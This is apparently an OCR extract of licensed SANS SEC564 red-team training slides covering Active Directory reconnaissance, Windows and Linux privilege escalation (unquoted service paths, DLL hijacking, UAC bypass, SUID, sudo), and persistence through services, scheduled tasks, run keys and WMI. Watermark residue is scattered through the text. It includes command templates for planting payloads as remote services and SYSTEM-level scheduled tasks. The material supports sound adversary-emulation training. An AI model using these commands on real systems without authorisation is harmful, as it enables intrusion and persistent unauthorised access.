References: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 https://www.harmj0y.net/blog/redteaming/local-group-enumeration/ https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 http://www.harmj0y.net/blog/tag/powerview/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

35

© SANS Institute 2020 BloodHound/SharpHound

090aff33bcb6e401ded410120bc9a268 • Ingests data obtained from AD with a 26 ,2 02 0

standard domain user – SharpHound • Needs to know: – Who is logged on where? – Who has admin rights where? – What users and groups belong to what groups?

> m

o.

– Find Shortest Paths to Domain Admins

co

• Through queries, it generates a diagram of active sessions and relationships

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

36

ak

er

@ ya

ho

22829180 i< an

nm

BloodHound BloodHound is a single-page JavaScript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell/C# ingestor. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attacks can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment. BloodHound is developed by @_wald0, @CptJesus, and @harmj0y.

ln

M

az

ze

Lincoln Mazzei nc o

Bloodhound requires three pieces of information from an Active Directory environment in order to function:

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ed

To :

Li

Who is logged on where? User sessions info Who has admin rights where? Local admin info What users and groups belong to what groups? Group memberships (Optionally) What principals have control over other user and group objects? AD Object DAVLs, OU structure, Group Policy Links

ce

ns

• • • •

Li

In most instances, collecting this information does not require Administrator privileges, and does not require executing code on remote systems. The PowerShell ingestor, based on PowerView, makes data collection fast and simple. The ingestor is located in the BloodHound repo at /Ingestors/. The collector collects many additional pieces of data, which give further paths as well as node properties for convenience.

live

References: https://github.com/BloodHoundAD/BloodHound https://blog.stealthbits.com/local-admin-mapping-bloodhound

36

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Privilege Escalation

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

37

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

37

© SANS Institute 2020 ATT&CK TA0004

Privilege Escalation

TM

• Vertical SYSTEM

– Medium integrity admin to High integrity admin or SYSTEM – Non-admin user to Admin/SYSTEM/root

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Obtaining different level of permission than granted [email protected] Ap ril

High Integrity Medium Integrity

– User A to User B

User B

o.

User A

co

m

>

• Horizontal

SEC564 | Red Team Exercises and Adversary Emulation

38

ak

er

@ ya

ho

22829180 i< an

nm

Privilege Escalation Privilege escalation is the result of actions that allows an adversary to obtain a higher level of permissions on a system or network. Certain tools or actions require a higher level of privilege to work and are likely necessary at many points throughout an operation. Adversaries can enter a system with unprivileged access and must take advantage of a system weakness to obtain local administrator or SYSTEM/root level privileges. A user account with administrator-like access can also be used. User accounts with permissions to access specific systems or perform specific functions necessary for adversaries to achieve their objective may also be considered an escalation of privilege.

ln

M

az

ze

Lincoln Mazzei nc o

Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications: Standard User become Administrator/root or SYSTEM

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users: User A accesses User B information

Li

ce

Reference: https://attack.mitre.org/tactics/TA0004/

live

38

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0004

Privilege Escalation Methods

TM

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

BeRoot checks for Common Privilege Escalation Methods

>

o.

co

m

BeRoot does not exploit. We will learn how to exploit

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

39

ak

er

@ ya

ho

22829180 i< an

nm

Privilege Escalation Methods As one can see in this image by Sagi Shahar, there are multiple methods to perform privilege escalation on various operating systems. Many are due to misconfigurations in file system, services, registry, scheduled tasks, etc. We will discuss some of the top ones used by adversaries and Red Teams.

ze

Lincoln Mazzei nc o

ln

M

az

BeRoot BeRoot, written by Alessandro Zanni, is a post exploitation tool to check common misconfigurations to find a way to escalate your privilege. It has been added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk). This tool does not exploit any of the privilege escalation paths it finds. Its main goal is to show potential ways to escalate privilege. This project works on Windows, Linux and Mac OS.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

References: https://attack.mitre.org/tactics/TA0004/ https://github.com/AlessandroZ/BeRoot

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

39

© SANS Institute 2020 ATT&CK T1034

Path Interception

TM

090aff33bcb6e401ded410120bc9a268 • If the path isn’t quoted: 26 ,2 02 0

– Incorrect: C:\Program Files\App\executable.exe – Correct: “C:\Program Files\App\executable.exe”

• Windows will try to locate and execute in the following order: – C:\Program.exe – C:\Program Files\App.exe – C:\Program Files\App\executable.exe

Applies to:

o.

co

m

>

Services Scheduled Tasks Startup Programs Registry Keys

22829180

SEC564 | Red Team Exercises and Adversary Emulation

40

ak

er

@ ya

– – – –

ho



Ap ril

[email protected]

i< an

nm

Path Interception There are multiple distinct weaknesses or misconfigurations that Red Team may take advantage of when performing path interception: Unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

az

ze

Lincoln Mazzei nc o

ln

M

If the services, scheduled tasks, or startup path isn’t quoted: C:\Program Files\App\executable.exe like it should be “C:\Program Files\App\executable.exe” Windows will try to locate and execute in the following order: C:\Program.exe C:\Program Files\App.exe C:\Program Files\App\executable.exe

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

An excellent command line to find these types of services (originally posted by Danial Compton) is wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Li

ce

Reference: Path Interception: https://attack.mitre.org/techniques/T1034/

live

40

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1038

DLL Search Order Hijacking

TM

090aff33bcb6e401ded410120bc9a268 Check if a DLL with same name is already in memory Check if DLL is defined in “KnownDLLs” registry key The directory from where the application was launched The system directory (C:\Windows\System32) The 16-bit system directory (C:\Windows\System) The Windows directory The current directory Directories defined in the PATH variables

co

m

>

Ap ril

[email protected] 22829180

SEC564 | Red Team Exercises and Adversary Emulation

41

ak

er

@ ya

ho

– – – – – – – –

o.



26 ,2 02 0

A dynamic-link library (DLL) is a module that contains functions and data that can be used by another module When a full path is not provided, Windows attempts to locate the DLL by searching pre-determined locations in this order:



i< an

nm

DLL Search Order Hijacking A dynamic-link library (DLL) is a module that contains functions and data that can be used by another module (application or DLL). Windows systems use a common method to look for required DLLs to load into a program. Red Team can take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. Red Team may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.

M

az

ze

Lincoln Mazzei nc o

ln

When a full path is not provided, Windows attempts to locate the DLL by searching predetermined locations in a predictable order:

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

To :

ed

ns

ce

• • • • • •

Check if a DLL with same name is already in memory Check if DLL is defined in “KnownDLLs” registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs) The directory from where the application was launched The system directory (C:\Windows\System32) The 16-bit system directory (C:\Windows\System) The Windows directory The current directory Directories defined in the PATH variables

Li

• •

live

References: https://docs.microsoft.com/en-us/windows/desktop/Dlls/dynamic-link-libraries https://docs.microsoft.com/en-us/windows/desktop/Dlls/dynamic-link-library-search-order https://attack.mitre.org/techniques/T1038/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

41

© SANS Institute 2020 ATT&CK T1044

Weak File System Permissions

TM

090aff33bcb6e401ded410120bc9a268 • Weak file system permissions may allow the creation or modification of existing binaries or DLLs

26 ,2 02 0

– Replacing current binary or DLL – Creating new binary or DLL to exploit Path Interception

• List scheduled tasks: C:\ schtasks • List services: C:\ sc

Ap ril

[email protected]

– Services run as SYSTEM

m

>

• Run and RunOnce Registry Keys

o.

co

– HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run – HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

SEC564 | Red Team Exercises and Adversary Emulation

42

ak

er

@ ya

ho

22829180 i< an

nm

Weak File System Permissions Path Interception and DLL Search Order Hijacking can be exploited by leveraging weak file system permissions. If the permissions on the file system directory containing the path interception or the permissions on the binary or DLL itself, are improperly set, then the binary or DLL may be overwritten with another binary using user-level permissions. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions.

M

Scheduled Tasks: Tasks can be scheduled to run with multiple permissions. Query scheduled tasks with the schtasks command. If any binary is scheduled to execute from a directory with weak file system permissions, Red Team can overwrite the binary with their own payload for that same privilege on next execution. Services: Most services start with SYSTEM privileges, meaning any configured service running from a directory with weak file system permissions can be overwritten to the Red Team payload for execution on next start. Services can be queried with the sc command. Registry Keys: Reviewing registry keys of binaries that will run may turn up services as well as Run keys.

nc o

ln



az

ze

Lincoln Mazzei

ns



ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Li

ce

References: File System Permissions Weakness: https://attack.mitre.org/techniques/T1044/ https://docs.microsoft.com/en-us/windows/desktop/setupapi/run-and-runonce-registry-keys

live

42

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1088

User Account Control (UAC)

TM

090aff33bcb6e401ded410120bc9a268 Windows security feature designed to split admin privileges from normal user privileges

26 ,2 02 0

• Implemented by Windows via “token integrity levels” – Low: Restricted privileges – Medium: Normal user privilege – High: Administrator privileges – SYSTEM: Highest Windows privilege

Ap ril

[email protected] o.

co

m

>

• UAC prevents a user with administrator privileges in a medium integrity context from performing admin tasks without approval via a UAC prompt SEC564 | Red Team Exercises and Adversary Emulation

43

ak

er

@ ya

ho

22829180 i< an

nm

User Account Control (UAC) Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allow them to enter an administrator password to complete the action.

az

ze

Lincoln Mazzei nc o

ln

M

References: https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-accountcontrol-works https://attack.mitre.org/techniques/T1088/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

43

© SANS Institute 2020 ATT&CK T1088

UAC Bypass

TM

090aff33bcb6e401ded410120bc9a268 Many methods have been discovered to bypass UAC 26 ,2 02 0

• UACMe: Over 50 methods documented: – DLL Hijack – Application Compatibility – Elevated COM Interface – Shell API • Just ask

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

44

ak

er

@ ya

ho

22829180 i< an

nm

UAC Bypass Many methods have been discovered to bypass UAC and documented in a very valuable resource on GitHub called UACMe. UACMe contains an extensive list of methods that have been discovered and implemented that Red Team can leverage for bypassing UAC:

ze

Lincoln Mazzei az

DLL Hijack: Executables that load DLLs without full path and vulnerable to DLL Search Order Hijacking Application Compatibility: Feature of recent versions of Windows for applications to be backwards compatible with newer versions of the operating system; allows applications to run as administrator and high integrity Elevated COM Interface: Some applications may be allowed to create an “Elevated COM Object” to perform system operations without UAC prompts Shell API: Spawn a separate elevated process with high integrity

nc o



ln

M

• •

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Li

ce

ns

ed

Just Ask After observing the end user activity, Red Team may opt for a simpler way to bypass UAC via social engineering, which is just asking the user to elevate. This method attempts to launch a higher integrity process as the current logged on, administrative user. If the user accepts the UAC prompt, the high integrity process (Red Team payload) will launch. This is not OpSec safe as it may cause the end user to become suspicious and report the activity. References: https://github.com/hfiref0x/UACME https://attack.mitre.org/techniques/T1088/

44

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 PowerUp

090aff33bcb6e401ded410120bc9a268 • Written by Will Schroeder (@harmj0y) 26 ,2 02 0

• Part of PowerSploit; included in Empire • PowerShell version 2.0-compliant • Looks for common Windows privilege escalation vectors • Can exploit some misconfigurations • Invoke-AllChecks

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

45

ak

er

@ ya

ho

22829180 i< an

nm

PowerUp PowerUp, written by Will Schroeder, is a PowerShell script that looks for common Windows privilege escalation vectors we have discussed. It utilizes various service abuse checks, DLL hijacking, registry checks, and more to enumerate common ways that you might be able to elevate on a target system. It can also exploit some of the misconfigurations it has identified.

az

ze

Lincoln Mazzei nc o

ln

M

In the screenshot on the slide, one can see the PowerUp implementation within Empire. /powerup/allchecks in Empire is similar to Invoke-AllChecks on the standalone PowerShell script. The script will search for various privilege escalation vectors and has some modules to exploit the misconfigurations. References: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

45

© SANS Institute 2020 ATT&CK T1169

Sudo

TM

090aff33bcb6e401ded410120bc9a268 /etc/sudoers file describes which users can run which commands 26 ,2 02 0

• Least privilege implementation • Only run with elevated permissions when needed • May prompt for password • Or not

Ap ril

[email protected] m co

See privilege:

o.



>

%sudo ALL=(ALL) NOPASSWD: ALL

$sudo -l

SEC564 | Red Team Exercises and Adversary Emulation

46

ak

er

@ ya

ho

22829180 i< an

nm

Sudo *nix systems historically implemented a strong least privilege model. Standard users perform all tasks except the ones that require administrative or other privileges with their standard user account. Programs requiring root privileges are started with the sudo command. Privilege escalations on *nix systems may be performed due to poor sudo configurations. The sudo configuration can be found in /etc/sudoers file. This file specifies what users or groups can run certain programs with higher privilege and if they require to input the current user’s password when doing so. Listing sudo rules is possible using sudo -l

M

az

ze

Lincoln Mazzei nc o

ln

References: https://attack.mitre.org/techniques/T1169/ https://xkcd.com/149/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

46

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1166

SetUID and SetGID

TM

090aff33bcb6e401ded410120bc9a268 • Normally, an executable runs in the current user’s context 26 ,2 02 0

• Some programs may need to be elevated to function properly, but the user does not need to be a sudoer • Any user can set their program to run as their user • SetUID or SetGID flag • Show file permission: $ ls -la • SetUID: $ chmod +s • Example: $ passwd

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

47

ak

er

@ ya

ho

22829180 i< an

nm

SetUID and SetGID Normally, a process runs in the current user’s context. Some programs may need to be executed as “elevated” to function properly, but the user does not need to be a sudoer. It would not be efficient to modify the sudoer file for each user and program that need such privilege. There are also many default programs with this privilege such as passwd which allows any user to modify their password and writes it to /etc/shadow which is only root readable and writeable. Any user can set their program to run as their user regardless of who is running it. SetUID (Set owner User ID up on execution) is a special type of file permissions given to a file. SetUID is defined as giving temporary permissions to a user or group (SetGID) to run a program/file with the permissions of the file owner rather than the user who runs it. If suid file is owned by root, you would execute it using root privilege. • • •

nc o

ln

M

az

ze

Lincoln Mazzei

Show file permission: $ ls -la Set UID: $ chmod +s Example: $ passwd

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Red Team can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the SetUID or SetGID bits to get code running in a different user’s context. To find binaries with SetUID set: $ find / user root -perm -4000 Reference: https://attack.mitre.org/techniques/T1166/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

47

© SANS Institute 2020 ATT&CK T1068

Exploitation for Privilege Escalation

TM

090aff33bcb6e401ded410120bc9a268 Local vulnerabilities have lower CVSS scores, delaying patching 26 ,2 02 0

• Operating System vulnerabilities • Third-party software – Non-Microsoft Services • Get-NonstandardService – Seatbelt.exe

Ap ril

[email protected] m

>

• .Net or Java Applications

o.

ho

22829180

SEC564 | Red Team Exercises and Adversary Emulation

48

ak

er

@ ya

• Custom software

co

– DNSpy to decompile

i< an

nm

Exploitation for Privilege Escalation The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes. Privilege escalation issues tend to have a lower score because the “Attack Vector” is “local.”

az

ze

Lincoln Mazzei nc o

ln

M

Dirty Cow CVE-2016-5195 is the official reference to this bug. CVE (Common Vulnerabilities and Exposures) is the Standard for Information Security Vulnerability Names maintained by MITRE™. "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system."

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

References: https://www.first.org/cvss/ https://github.com/GhostPack/Seatbelt https://github.com/0xd4d/dnSpy https://attack.mitre.org/techniques/T1068/ https://dirtycow.ninja/

48

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Persistence

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

49

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

49

© SANS Institute 2020 ATT&CK TA0003

Persistence

TM

090aff33bcb6e401ded410120bc9a268 An access, action, or configuration change to maintain access 26 ,2 02 0

• Maintain access through reboots • Most access thus far has been memory only • Persistence will require touching disk

Ap ril

[email protected] o.

co

m

• Consider using different attack infrastructure and listeners for persistence payloads

>

– More opportunity for the Blue Team to catch Red Team

SEC564 | Red Team Exercises and Adversary Emulation

50

ak

er

@ ya

ho

22829180 i< an

nm

Persistence Red Team has worked hard to obtain initial access; the persistence step allows that access to be maintained without having to perform the original action such as phishing or exploitation. Thus far, Red Team is most likely running a process/payload in memory and has not touched disk. Most persistence will require making a change at the hard drive level to ensure access is obtained after reboots. This provides more opportunities for Blue Team to catch Red Team. One thing to consider is using different attack infrastructure (domain, hosting, and listeners) than the previous payloads used.

M

az

ze

Lincoln Mazzei nc o

ln

According to MITRE™ ATT&CK, persistence is any access, action, or configuration change to a system that gives an adversary a persistent presence on that system. Adversaries will often need to maintain access to systems through interruptions such as system restarts, loss of credentials, or other failures that would require a remote access tool to restart or alternate backdoor for them to regain access.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://attack.mitre.org/tactics/TA0003/

live

50

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1050

New Service

TM

090aff33bcb6e401ded410120bc9a268 Services run on startup or on demand and in different context 26 ,2 02 0

• In Windows, use the service controller command (sc) to define the payload as a new service and then start it: C:\> sc \\[targetIP] create [svcname] binpath= [payload] C:\> sc \\[targetIP] start [svcname]

[email protected] Ap ril

• In *nix, it will depend on the distribution

o.

co

m

>

– Review the run level list in /etc/inittab – Modify the file for the run level – Edit the /etc/rc.local file to run service as root after startup

SEC564 | Red Team Exercises and Adversary Emulation

51

ak

er

@ ya

ho

22829180 i< an

nm

New Service When operating systems boot up, they can start programs or applications called services that perform background system functions. A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. Red Team may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, meaning an adversary may also use a service to escalate privileges from administrator to SYSTEM.

ln

M

az

ze

Lincoln Mazzei nc o

On a Windows machine, use the sc command to start up the payload as a service. Create the service on the target machine, specifying a binpath (binary path), which is just the command you'd like to run: C:\> sc \\[targetIP] create [svcname] binpath= [payload]. You have to specify binpath equals space command. The space must come between the equals sign and the command and nowhere else. The command can have a full set of command arguments, as well, if you simply embed the command and arguments in double quotes, as in binpath= "c:\payload.exe". By default, services are created as "demand," meaning that we have to start them manually. We could alternatively specify "start= auto", which would make a service that automatically starts. After creating the service, we can then make it run, as follows: C:\> sc \\[targetIP] start [svcname]

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

On *nix, service configurations will vary on the distribution. Generally, the /etc/inittab file has the list of runlevels for the distribution. The boot process uses these parameters to identify the default runlevel and the files that will be used by that runlevel. You may assume that this refers to different levels that the system goes through during a boot up. Instead, think of the runlevel as the point at which the system is entered. Based on the runlevel, edit the desired file to add your payload as a executable once the system reaches that runlevel. If this all still sounds a bit too complicated, you can instead simply make use of the /etc/rc.d/rc.local file. This script file is run once, before all other scripts have run but before the logon prompt appears.

live

References: New Service: https://attack.mitre.org/techniques/T1050/ Masquerading: https://attack.mitre.org/techniques/T1036/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

51

© SANS Institute 2020 ATT&CK T1050

Starting Windows Services

TM

090aff33bcb6e401ded410120bc9a268 When a service starts, it sends an API call •

Option A: start a cmd.exe, then invoke another command – The cmd.exe lives for only 30 seconds, but the command it spawns will continue running: C:\> sc \\[targetIP] create [svcname] binpath= "cmd.exe /k [command]" Option B: Use a program to wrap an executable so that it throws the API call indicating a successful service start – InGuardians' free ServifyThis tool does this … free at https://github.com/inguardians/ServifyThis

26 ,2 02 0

back saying so; if not received, the process ends

> m

o.

co



Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

52

ak

er

@ ya

ho

22829180 i< an

nm

Starting Windows Services Creating a new service is an excellent way to escalate privileges to SYSTEM as well as a persistence method. When a service starts, it needs to send an API call stating it started successfully. If Windows doesn't receive an API call from a newly started service within 30 seconds saying that the service started successfully, it kills the process. To dodge the dilemma of the service dying after 30 seconds, you have two options:

az

ze

Lincoln Mazzei nc o

ln

M

Option A, you could define your binpath not to be the individual command you want to run but instead it could be a cmd.exe that invokes the command you want to run, using the /k option, which causes cmd.exe to run another command and remain running. Then, when the operating system kills the cmd.exe you started as a service, it kills the parent of the process you wanted to start (cmd.exe) and not the process itself in which your command is running. This will leave an error in the Windows event log. C:\> sc \\[targetIP] create netcat binpath= "cmd.exe /k "

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Option B for dodging the 30-second dilemma involves taking the executable you want to run and wrapping it in code that makes the appropriate system calls to indicate that it has started successfully as a service. InGuardians has released a free tool that does this, called ServifyThis. With this tool, you can simply take your payload, wrap it in ServifyThis, and specify the binpath of an sc command as the executable outputted by ServifyThis.

References: New Service: https://attack.mitre.org/techniques/T1050/ ServifyThis: https://github.com/inguardians/ServifyThis

live

52

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1053

Scheduled Tasks

TM

090aff33bcb6e401ded410120bc9a268 In Windows, the Schedule service allows for configuring your payload to run at Startup



26 ,2 02 0

– Make sure the schedule service is running: C:\> sc query schedule – Create the new task: C:\> schtasks /create /tn [taskname] /sc [frequency] /u [user] /p [password] /tr [command] • Frequency: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE • To run command as SYSTEM, replace /u [user] /p [password] with /ru SYSTEM – Check status of job with: C:\> schtasks /query /s

co

m

>

Ap ril

[email protected] o.

• In *nix, use cron jobs in /etc/crontab or /etc/cron.d/ SEC564 | Red Team Exercises and Adversary Emulation

53

ak

er

@ ya

ho

22829180 ze

az

M

nc o



Lincoln Mazzei

Verify that the Schedule service is running on the target: C:\> sc query schedule Make sure the output of this command says that the STATE of the Schedule service is RUNNING. If it is not, start the service using: C:\> sc start schedule Create the job: C:\> schtasks /create /tn [taskname] /sc [frequency] /st [starttime] /sd [startdate] /tr [payload]. The frequency (specified with /sc) can be any one of numerous settings to make the job run repeatedly, including MINUTE, HOURLY, DAILY, and so on. To use schtasks to run a command as local SYSTEM instead of as an individual user, we use the /ru SYSTEM syntax in the invocation. After you schedule the job, you should verify that it is scheduled to run, again using either at or schtasks: C:\> schtasks /query /s

ln

• •

i< an

nm

Scheduled Tasks In Windows, Red Team can use the schtasks command to schedule a job to run a payload as individual users or as local SYSTEM:

To :

ed



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

In *nix, system-wide cron jobs are configured by modifying /etc/crontab file, /etc/cron.d/ directory or other locations supported by the Cron daemon. This allows for commands, scripts, or payloads to be executed at specific, periodic intervals in the background without user interaction. Red Team may use job scheduling to execute programs at system startup or on a scheduled basis for persistence.

live

References: Scheduled Task: https://attack.mitre.org/techniques/T1053/ Local Job Scheduling: https://attack.mitre.org/techniques/T1168/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

53

© SANS Institute 2020 ATT&CK T1060

Registry Run Keys / Startup Folder

TM

090aff33bcb6e401ded410120bc9a268 • Copy the payload to the local drive 26 ,2 02 0

• Reference it in the Registry or Startup folder • Based on privilege, it will be userland or system wide – Userland: When the user logs in – System wide: When the system boots up

[email protected] Ap ril

• Some example locations

o.

co

m

>

– HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run – HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run – HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Shell Folders SEC564 | Red Team Exercises and Adversary Emulation

54

ak

er

@ ya

ho

22829180 i< an

nm

Registry Run Keys / Startup Folder Persistence is also possible at the user level or system level with Registry Run Keys or via the Startup Folder. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. Based on the privilege of the user on the system, persistence can be created for that end user when he/she logs in or when the system boots up. Note that the payload will have to be copied to the disk and referenced below for execution. This is not OpSec friendly and may result in Red Team getting caught.

az

ze

Lincoln Mazzei ln

M

Userland:

nc o

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

System wide:

ce

ns

ed

• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Li

The following Registry keys can be used to set startup folder items for persistence: • • • •

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

live

Reference: https://attack.mitre.org/techniques/T1060/

54

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1084

WMI Persistence

TM

090aff33bcb6e401ded410120bc9a268 • WMI Event Subscriptions can link an action together with a trigger (time or event based) using:

26 ,2 02 0

– EventConsumers – action to perform – EventFilters – trigger – EventFilterToConsumer – binds filter to consumer

o.

co

m

>

Ap ril

